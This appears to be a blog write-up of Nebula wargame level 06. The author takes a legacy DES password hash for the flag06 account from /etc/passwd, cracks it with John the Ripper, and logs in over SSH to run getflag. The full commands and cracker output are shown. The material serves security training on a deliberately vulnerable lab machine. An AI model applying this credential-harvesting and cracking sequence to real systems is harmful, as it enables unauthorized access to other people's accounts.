In the /etc/passwd file I found a snippet for the flag06 user, with the old-fashioned password encrypted:
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/shTo crack this, I went to my trusty BackTrack virtual machine, and ran John The Ripper against it.
root@bt:/pentest/passwords/john# echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > /root/flag06 root@bt:/pentest/passwords/john# ./john /root/flag06 Loaded 1 password hash (Traditional DES [128/128 BS SSE2]) hello (flag06) guesses: 1 time: 0:00:00:00 100.00% (2) (ETA: Fri Dec 2 09:51:10 2011) c/s: 7530 trying: 12345 - biteme
Thanks go john, I now know the flag06 password is "hello". So I ssh locally, and run "getflag" to complete the challenge.
level06@nebula:/home/flag06$ ssh flag06@localhost
_ __ __ __
/ | / /__ / /_ __ __/ /___ _
/ |/ / _ \/ __ \/ / / / / __ `/
/ /| / __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
flag06@localhost's password:
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Fri Dec 2 06:51:34 2011 from localhost
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account
There you have it. Level 06 complete, with a warm and fuzzy look back in history.
No comments:
Post a Comment